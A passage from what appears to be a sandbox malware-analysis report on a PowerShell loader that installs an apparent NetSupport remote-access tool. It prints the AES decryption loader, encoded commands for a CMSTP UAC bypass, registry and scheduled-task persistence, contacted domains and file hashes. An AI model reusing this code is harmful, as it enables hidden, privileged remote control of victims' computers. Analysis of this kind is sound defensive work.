vDXdBCG1jHKBUKBpr8lsmgUMYv+XFQyP+9PFkeQubE4TxWcRIhchDe22d2+0R+GmXx8LBgrq2+4ZoDkNnD9/ThD269G255Q8KE76Z/xAoPr+JCFGiplU/Y4ZEW9WQfcK/56qyl3qWD8rZgo+tpaKHcWI4Rz47W56LO7nmGKdy5hZ1Yv5JQ+Mzm6T9qhZWBrRvOShwRB37EK1Qk4ulSkZBks4sbk4b1+eaQDrTZNlCdDqAYPuRgg+tci2Re+kj0nJX4qS8K6g0Nd1Ea0Aqd/VRyKMeZbxVakjm4swRJWDvfeAZCO1wi8ldRBOjISvLwrbGkZ6RCgHdrmT9dh9TVNMUX997skUsrRyq1g9I6rbRtGs9ze/9aZKHMJEXNsQAz3crUgVXSmNYm/zVpPK/zZkAid9KOg8yO3bdDXLzTNZ12QtX+sfeZQWrT6bh0t3Wvz0R+wpEjhw86LgrJvu8ATsT0rnz0LpLDixbcsf0UWND0D4Vtzum2LNJInbjx5rOZqqZkRbUQI4UgWMzXhOJUdH61bD+mQFjksH6tyuTOMDrxDCwwnJSZ6kV83Qq0BmTzHYdRMC4FjPOod1QsfsLy4uYmaAtBYmX5d0CBPXdGQJY+d16fAkiS4EEq71SBo1+MlEhjODiT4DoN4f5AJn67jyDA4cnE5ly8LyvMLRnj6p7mO/F6wClJJ1CDNOyOGOpOSocM8Jng1hfCxtfLZUioyP4Lhd0vdtR/b+y6DRLOY9wJdigYsiEz1h6lWwm6fW0IYz5FefsFbJ+sPX+fH3BC1Jse4p0w4pBj8ziqRRaxAxlUdhBKRPfGuZU0EIIWoSIPnQwuh0aRD5jyq99CiaV0Gzq5HVDIrQ3LbUOF7VSmmsVv1ON8TESZ8fs13bScVJmkcYGpXsoP8iJLeBigIZh2synd/TLxyCo+kcnRjg5QXDbfW9rk45uy49UFlKd25+ulQjPZNSRkhKJMgrhT3thzCFCuURy6f/0DJMTBbadn2/rmixiX+7eFYwoZP4yaqgy3MNNvrN/NM3qHUkOAi65UnxZOyHpv6Oyb2O8iI8PTMFubKKhGL6ojHZgVC7V4cIOcp0izBUyRZj2H9aL1A6RQQIr4iy6i54EYVvgHDTkhgejoPcLd4pkpWjsZh0/cAnb8Y26EuPY+H9i1gJtUtI/Ih/5whUgWJdaBf+X9p1g8D98DLeLV4BlCe1Qz1OvtKCITeFX0HFIjMdEbVQZWIawvBGwfJFmyNzi1AiHOebecIjy97rI5jlMF1OldZFVo0uk1hhKxnaTFk7eMq45BsDsNZPaumaCbecYpAVlEtSdsx98tPHbZ3ysYTG9A/ooejgSSLcLvFXjNYKUF36biCkhsLzHz6hUz9/Mb56eOBW/0u43L4UYH60styVu2GcUA8eoBSB8RpZs26W3boUMgndpD529JKLQhcRd4tVP+DfW/n0W5ivyqtRbP24B1l0V6YTH6v//RYPjvb9wNRQtWRFFQD9tax8K/ejY4Ijv5Tfjt/iGuObaqR3xZbkKWtxl6L8vYY6M4ym1U/uLFFqZCK6yPHgo3OiKrQjDy5H2NCX08qGIihRhwVgp0AsLJ3jbcVaucCIP+pb/ccGSPqiHFOcnYsKvBw9XDkE5ugqBPxYB0uCNcX2KRzc57KAOBS9DB+pPOBf13XrQIlDcb1dpIsTzDhX651PzBp1B4VXaJD7OtQdgfIkfhabJ/7QA+TyjHG+q7KZRFLRlWahTMRayEH0FhAGosXrSBnywhWBQAGTfhlrvZUZIbjQvqhHkQlYcCOEnlFL0W9Z3Is2OR8az8HW+b2ISkOZvp';$QcRGrPc = 'ZWdYRXFVeWZGcVZNVlJXYWxURnRZc2ZZeFFoUk9XSWQ=';$WpXrWka = New-Object 'System.Security.Cryptography.AesManaged';$WpXrWka.Mode = [System.Security.Cryptography.CipherMode]::ECB;$WpXrWka.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$WpXrWka.BlockSize = 128;$WpXrWka.KeySize = 256;$WpXrWka.Key = [System.Convert]::FromBase64String($QcRGrPc);$SSGYL = [System.Convert]::FromBase64String($uGSyEn);$yAgygcvl = $SSGYL[0..15];$WpXrWka.IV = $yAgygcvl;$ixbKtdOeJ = $WpXrWka.CreateDecryptor();$AbQURXmxw = $ixbKtdOeJ.TransformFinalBlock($SSGYL, 16, $SSGYL.Length - 16);$WpXrWka.Dispose();$tZUSbrft = New-Object System.IO.MemoryStream( , $AbQURXmxw );$UfhVzIKO = New-Object System.IO.MemoryStream;$KFAgbvVxM = New-Object System.IO.Compression.GzipStream $tZUSbrft, ([IO.Compression.CompressionMode]::Decompress);$KFAgbvVxM.CopyTo( $UfhVzIKO );$KFAgbvVxM.Close();$tZUSbrft.Close();[byte[]] $qvUGhdu = $UfhVzIKO.ToArray();$AjSplBV = [System.Text.Encoding]::UTF8.GetString($qvUGhdu);$AjSplBV
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAB1AG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAAaABpAGQAZABlAG4AIAAtAEUAbgBjAG8AZABlAGQAIAAiACAAVQBnAEIARgBBAEUAYwBBAEkAQQBCAEIAQQBHAFEAQQBaAEEAQQBnAEEAQwBJAEEAUwBBAEIATABBAEUAVQBBAFcAUQBCAGYAQQBFAE0AQQBUAEEAQgBCAEEARgBNAEEAVQB3AEIARgBBAEYATQBBAFgAdwBCAFMAQQBFADgAQQBUAHcAQgBVAEEARgB3AEEAUQB3AEIATQBBAEYATQBBAFMAUQBCAEUAQQBGAHcAQQBlAHcAQQAyAEEARABRAEEATgBRAEIARwBBAEUAWQBBAE0AQQBBADAAQQBEAEEAQQBMAFEAQQAxAEEARABBAEEATwBBAEEAeABBAEMAMABBAE0AUQBBAHcAQQBEAEUAQQBRAGcAQQB0AEEARABrAEEAUgBnAEEAdwBBAEQAZwBBAEwAUQBBAHcAQQBEAEEAQQBRAFEAQgBCAEEARABBAEEATQBBAEEAeQBBAEUAWQBBAE8AUQBBADEAQQBEAFEAQQBSAFEAQgA5AEEARgB3AEEAYwB3AEIAbwBBAEcAVQBBAGIAQQBCAHMAQQBGAHcAQQBiAHcAQgB3AEEARwBVAEEAYgBnAEIAYwBBAEcATQBBAGIAdwBCAHQAQQBHADAAQQBZAFEAQgB1AEEARwBRAEEASQBnAEEAZwBBAEMAOABBAFoAZwBBAGcAQQBDADgAQQBkAGcAQgBsAEEAQwBBAEEATAB3AEIAMABBAEMAQQBBAFUAZwBCAEYAQQBFAGMAQQBYAHcAQgBUAEEARgBvAEEASQBBAEEAdgBBAEcAUQBBAEkAQQBCAEQAQQBEAG8AQQBYAEEAQgBWAEEASABNAEEAWgBRAEIAeQBBAEgATQBBAFgAQQBCAEIAQQBHAFEAQQBiAFEAQgBwAEEARwA0AEEAWABBAEIAQgBBAEgAQQBBAGMAQQBCAEUAQQBHAEUAQQBkAEEAQgBoAEEARgB3AEEAVQBnAEIAdgBBAEcARQBBAGIAUQBCAHAAQQBHADQAQQBaAHcAQgBjAEEARQBrAEEAYgB3AEIAdQBBAEcAawBBAFkAdwBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARwBJAEEAWQBRAEIAdQBBAEcAUQBBAFgAQQBCAGoAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAegBBAEQASQBBAEwAZwBCAGwAQQBIAGcAQQBaAFEAQQA3AEEAQwBRAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQA5AEEAQwBBAEEASwBBAEIATwBBAEcAVQBBAGQAdwBBAHQAQQBGAE0AQQBZAHcAQgBvAEEARwBVAEEAWgBBAEIAMQBBAEcAdwBBAFoAUQBCAGsAQQBGAFEAQQBZAFEAQgB6AEEARwBzAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQB0AEEARQBVAEEAZQBBAEIAbABBAEcATQBBAGQAUQBCADAAQQBHAFUAQQBJAEEAQgBEAEEARABvAEEAWABBAEIAVgBBAEgATQBBAFoAUQBCAHkAQQBIAE0AQQBYAEEAQgBCAEEARwBRAEEAYgBRAEIAcABBAEcANABBAFgAQQBCAEIAQQBIAEEAQQBjAEEAQgBFAEEARwBFAEEAZABBAEIAaABBAEYAdwBBAFUAZwBCAHYAQQBHAEUAQQBiAFEAQgBwAEEARwA0AEEAWgB3AEIAYwBBAEUAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQgBDAEEARwBFAEEAYwB3AEIAbABBAEcASQBBAFkAUQBCAHUAQQBHAFEAQQBYAEEAQgBqAEEARwB3AEEAYQBRAEIAbABBAEcANABBAGQAQQBBAHoAQQBEAEkAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAcABBAEQAcwBBAEoAQQBCAFUAQQBIAEkAQQBhAFEAQgBuAEEARwBjAEEAWgBRAEIAeQBBAEMAQQBBAFAAUQBBAGcAQQBFADQAQQBaAFEAQgAzAEEAQwAwAEEAVQB3AEIAagBBAEcAZwBBAFoAUQBCAGsAQQBIAFUAQQBiAEEAQgBsAEEARwBRAEEAVgBBAEIAaABBAEgATQBBAGEAdwBCAFUAQQBIAEkAQQBhAFEAQgBuAEEARwBjAEEAWgBRAEIAeQBBAEMAQQBBAEwAUQBCAEIAQQBIAFEAQQBUAEEAQgB2AEEARwBjAEEAVAB3AEIAdQBBAEQAcwBBAFUAZwBCAGwAQQBHAGMAQQBhAFEAQgB6AEEASABRAEEAWgBRAEIAeQBBAEMAMABBAFUAdwBCAGoAQQBHAGcAQQBaAFEAQgBrAEEASABVAEEAYgBBAEIAbABBAEcAUQBBAFYAQQBCAGgAQQBIAE0AQQBhAHcAQQBnAEEAQwAwAEEAVgBBAEIAaABBAEgATQBBAGEAdwBCAE8AQQBHAEUAQQBiAFEAQgBsAEEAQwBBAEEASQBnAEIAQwBBAEcARQBBAFkAdwBCAHIAQQBHAGMAQQBjAGcAQgB2AEEASABVAEEAYgBnAEIAawBBAEUATQBBAGEAQQBCAGwAQQBHAE0AQQBhAHcAQQBpAEEAQwBBAEEATABRAEIAQgBBAEcATQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQBnAEEAQwBRAEEAUQBRAEIAagBBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBJAEEAQQB0AEEARgBRAEEAYwBnAEIAcABBAEcAYwBBAFoAdwBCAGwAQQBIAEkAQQBJAEEAQQBrAEEARgBRAEEAYwBnAEIAcABBAEcAYwBBAFoAdwBCAGwAQQBIAEkAQQBJAEEAQQB0AEEARgBJAEEAZABRAEIAdQBBAEUAdwBBAFoAUQBCADIAQQBHAFUAQQBiAEEAQQBnAEEAQwBJAEEAUwBBAEIAcABBAEcAYwBBAGEAQQBCAGwAQQBIAE0AQQBkAEEAQQBpAEEAQwBBAEEATABRAEIARwBBAEcAOABBAGMAZwBCAGoAQQBHAFUAQQBPAHcAQgBUAEEASABRAEEAWQBRAEIAeQBBAEgAUQBBAEwAUQBCAFEAQQBIAEkAQQBiAHcAQgBqAEEARwBVAEEAYwB3AEIAegBBAEMAQQBBAFEAdwBBADYAQQBGAHcAQQBWAFEAQgB6AEEARwBVAEEAYwBnAEIAegBBAEYAdwBBAFEAUQBCAGsAQQBHADAAQQBhAFEAQgB1AEEARgB3AEEAUQBRAEIAdwBBAEgAQQBBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARgBJAEEAYgB3AEIAaABBAEcAMABBAGEAUQBCAHUAQQBHAGMAQQBYAEEAQgBKAEEARwA4AEEAYgBnAEIAcABBAEcATQBBAFEAZwBCAGgAQQBIAE0AQQBaAFEAQgBpAEEARwBFAEEAYgBnAEIAawBBAEYAdwBBAFkAdwBCAHMAQQBHAGsAQQBaAFEAQgB1AEEASABRAEEATQB3AEEAeQBBAEMANABBAFoAUQBCADQAQQBHAFUAQQAiACcAKQAkAEkAbgBmAEMAbwBuAHQAZQBuAHQAPQBAACIADQAKAFsAdgBlAHIAcwBpAG8AbgBdAA0ACgBTAGkAZwBuAGEAdAB1AHIAZQAgAD0AYAAkAGMAaABpAGMAYQBnAG8AYAAkAA0ACgBBAGQAdgBhAG4AYwBlAGQASQBOAEYAIAA9ACAAMgAuADUADQAKAFsARABlAGYAYQB1AGwAdABJAG4AcwB0AGEAbABsAF0ADQAKAEMAdQBzAHQAbwBtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgAD0AIABDAHUAcwB0AEkAbgBzAHQARABlAHMAdABTAGUAYwB0AGkAbwBuAEEAbABsAFUAcwBlAHIAcwANAAoAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwAgAD0AIABSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4ADQAKAFsAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwBTAGUAYwB0AGkAbwBuAF0ADQAKADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA0ACgAkAEMAbwBtAG0AYQBuAGQAVABvAEUAeABlAGMAdQB0AGUADQAKAHQAYQBzAGsAawBpAGwAbAAgAC8ASQBNACAAYwBtAHMAdABwAC4AZQB4AGUAIAAvAEYADQAKAFsAQwB1AHMAdABJAG4AcwB0AEQAZQBzAHQAUwBlAGMAdABpAG8AbgBBAGwAbABVAHMAZQByAHMAXQANAAoANAA5ADAAMAAwACwANAA5ADAAMAAxAD0AQQBsAGwAVQBTAGUAcgBfAEwARABJAEQAUwBlAGMAdABpAG8AbgAsACAANwANAAoAWwBBAGwAbABVAFMAZQByAF8ATABEAEkARABTAGUAYwB0AGkAbwBuAF0ADQAKACIASABLAEwATQAiACwAIAAiAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwACAAUABhAHQAaABzAFwAQwBNAE0ARwBSADMAMgAuAEUAWABFACIALAAgACIAUAByAG8AZgBpAGwAZQBJAG4AcwB0AGEAbABsAFAAYQB0AGgAIgAsACAAIgAlAFUAbgBlAHgAcABlAGMAdABlAGQARQByAHIAbwByACUAIgAsACAAIgAiAA0ACgBbAFMAdAByAGkAbgBnAHMAXQANAAoAUwBlAHIAdgBpAGMAZQBOAGEAbQBlAD0AIgBOAG8AdABlAHAAYQBkACIADQAKAFMAaABvAHIAdABTAHYAYwBOAGEAbQBlAD0AIgBOAG8AdABlAHAAYQBkACIADQAKACIAQAA7ACQASQBuAGYAQwBvAG4AdABlAG4AdAAgAHwAIABPAHUAdAAtAEYAaQBsAGUAIAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIABBAFMAQwBJAEkAfQBGAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEgAdwBuAGQAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACgAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJABUAHIAdQBlACwAVgBhAGwAdQBlAEYAcgBvAG0AUABpAHAAZQBsAGkAbgBlAEIAeQBQAHIAbwBwAGUAcgB0AHkATgBhAG0AZQA9ACQAVAByAHUAZQApAF0AWwBzAHQAcgBpAG4AZwBdACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlACkAUAByAG8AYwBlAHMAcwB7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAnAFMAdABvAHAAJwA7AFQAcgB5AHsAJABoAHcAbgBkACAAPQAgAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAE0AYQBpAG4AVwBpAG4AZABvAHcASABhAG4AZABsAGUAOwB9AEMAYQB0AGMAaAB7ACQAaAB3AG4AZAA9ACQAbgB1AGwAbAA7AH0AJABoAGEAcwBoAD0AQAB7AFAAcgBvAGMAZQBzAHMATgBhAG0AZQA9ACQAUAByAG8AYwBlAHMAcwBOAGEAbQBlADsASAB3AG4AZAA9ACQAaAB3AG4AZAA7AH0AOwBOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABQAHMATwBiAGoAZQBjAHQAIAAtAFAAcgBvAHAAZQByAHQAeQAgACQAaABhAHMAaAB9AH0AZgB1AG4AYwB0AGkAbwBuACAAUwBlAHQALQBXAGkAbgBkAG8AdwBBAGMAdABpAHYAZQB7AFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoACkAXQBQAGEAcgBhAG0AKABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAFQAcgB1AGUALABWAGEAbAB1AGUARgByAG8AbQBQAGkAcABlAGwAaQBuAGUAQgB5AFAAcgBvAHAAZQByAHQAeQBOAGEAbQBlAD0AJABUAHIAdQBlACkAXQBbAHMAdAByAGkAbgBnAF0AJABOAGEAbQBlACkAUAByAG8AYwBlAHMAcwB7ACQAaAB3AG4AZAA9AEcAZQB0AC0ASAB3AG4AZAAgAC0AUAByAG8AYwBlAHMAcwBOAGEAbQBlACAAJABOAGEAbQBlACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEUAeABwAGEAbgBkAFAAcgBvAHAAZQByAHQAeQAgAEgAdwBuAGQAOwBbAGkAbgB0AF0AJABoAGEAbgBkAGwAZQA9ACQAaAB3AG4AZAA7AGkAZgAoACQAaABhAG4AZABsAGUAIAAtAGcAdAAgADAAKQB7AFsAdgBvAGkAZABdAFsAVwBQAEkAQQAuAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzAF0AOgA6AFAAbwBzAHQATQBlAHMAcwBhAGcAZQAoACQAaABhAG4AZABsAGUALABbAFcAUABJAEEALgBDAG8AbgBzAG8AbABlAFUAdABpAGwAcwBdADoAOgBXAE0AXwBDAEgAQQBSACwAMQAzACwAMAApAH0AJABoAGEAcwBoAD0AQAB7AFAAcgBvAGMAZQBzAHMAPQAkAE4AYQBtAGUAOwBIAHcAbgBkAD0AJABoAHcAbgBkAH0AOwBOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABQAHMATwBiAGoAZQBjAHQAIAAtAFAAcgBvAHAAZQByAHQAeQAgACQAaABhAHMAaAB9AH0AOwAuACAAUwBlAHQALQBJAE4ARgBGAGkAbABlADsAYQBkAGQALQB0AHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwA7AEkAZgAoAFQAZQBzAHQALQBQAGEAdABoACAAJABJAG4AZgBGAGkAbABlAEwAbwBjAGEAdABpAG8AbgApAHsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAGMAbQBzAHQAcAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC8AYQB1ACAAIgAiACQASQBuAGYARgBpAGwAZQBMAG8AYwBhAHQAaQBvAG4AIgAiACIAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAE0AaQBuAGkAbQBpAHoAZQBkADsAZABvAHsAfQB1AG4AdABpAGwAKAAoAFMAZQB0AC0AVwBpAG4AZABvAHcAQQBjAHQAaQB2AGUAIABjAG0AcwB0AHAAKQAuAEgAdwBuAGQAIAAtAG4AZQAgADAAKQB9AA0ACgA=
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\beumlt25\beumlt25.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42F0.tmp" "c:\Users\Admin\AppData\Local\Temp\beumlt25\CSCF5AF3DF95E0D4AF7A03E278C2DF0CAFC.TMP"
C:\Windows\SysWOW64\cmstp.exe
"C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy unrestricted -WindowStyle hidden -Encoded UgBFAEcAIABBAGQAZAAgACIASABLAEUAWQBfAEMATABBAFMAUwBFAFMAXwBSAE8ATwBUAFwAQwBMAFMASQBEAFwAewA2ADQANQBGAEYAMAA0ADAALQA1ADAAOAAxAC0AMQAwADEAQgAtADkARgAwADgALQAwADAAQQBBADAAMAAyAEYAOQA1ADQARQB9AFwAcwBoAGUAbABsAFwAbwBwAGUAbgBcAGMAbwBtAG0AYQBuAGQAIgAgAC8AZgAgAC8AdgBlACAALwB0ACAAUgBFAEcAXwBTAFoAIAAvAGQAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAbwBuAGkAYwBCAGEAcwBlAGIAYQBuAGQAXABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACQAQQBjAHQAaQBvAG4AIAA9ACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAbwBuAGkAYwBCAGEAcwBlAGIAYQBuAGQAXABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQApADsAJABUAHIAaQBnAGcAZQByACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQATABvAGcATwBuADsAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AVABhAHMAawBOAGEAbQBlACAAIgBCAGEAYwBrAGcAcgBvAHUAbgBkAEMAaABlAGMAawAiACAALQBBAGMAdABpAG8AbgAgACQAQQBjAHQAaQBvAG4AIAAtAFQAcgBpAGcAZwBlAHIAIAAkAFQAcgBpAGcAZwBlAHIAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACIASABpAGcAaABlAHMAdAAiACAALQBGAG8AcgBjAGUAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABJAG8AbgBpAGMAQgBhAHMAZQBiAGEAbgBkAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUA
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" Add HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command /f /ve /t REG_SZ /d C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe
"C:\Users\Admin\AppData\Roaming\IonicBaseband\client32.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /IM cmstp.exe /F
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 95.101.74.111:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.74.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.121.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tds-images.thedailystar.net | udp |
| US | 151.101.1.55:443 | tds-images.thedailystar.net | tcp |
| US | 8.8.8.8:53 | 55.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cbngummies.com | udp |
| US | 198.57.244.151:443 | cbngummies.com | tcp |
| US | 8.8.8.8:53 | 151.244.57.198.in-addr.arpa | udp |
| US | 198.57.244.151:443 | cbngummies.com | tcp |
| US | 8.8.8.8:53 | conluase62.com | udp |
| US | 94.158.247.27:5051 | conluase62.com | tcp |
| US | 8.8.8.8:53 | geo.netsupportsoftware.com | udp |
| GB | 62.172.138.67:80 | geo.netsupportsoftware.com | tcp |
| US | 8.8.8.8:53 | 27.247.158.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.138.172.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.153.241.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 95.101.74.111:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 203.151.224.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.173.189.20.in-addr.arpa | udp |
Files
memory/1368-134-0x00000000717D0000-0x0000000071F80000-memory.dmp
memory/1368-133-0x0000000004F30000-0x0000000004F66000-memory.dmp
memory/1368-135-0x0000000005070000-0x0000000005080000-memory.dmp
memory/1368-136-0x00000000056B0000-0x0000000005CD8000-memory.dmp
memory/1368-137-0x0000000005550000-0x0000000005572000-memory.dmp
memory/1368-138-0x0000000005D50000-0x0000000005DB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enzew10p.31g.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1368-139-0x0000000005EF0000-0x0000000005F56000-memory.dmp
memory/1368-149-0x0000000006530000-0x000000000654E000-memory.dmp
memory/1368-150-0x0000000005070000-0x0000000005080000-memory.dmp
memory/1368-151-0x00000000074F0000-0x0000000007586000-memory.dmp
memory/1368-152-0x0000000006A30000-0x0000000006A4A000-memory.dmp
memory/1368-153-0x0000000006A80000-0x0000000006AA2000-memory.dmp
memory/1368-154-0x0000000007B40000-0x00000000080E4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | def65711d78669d7f8e69313be4acf2e |
| SHA1 | 6522ebf1de09eeb981e270bd95114bc69a49cda6 |
| SHA256 | aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c |
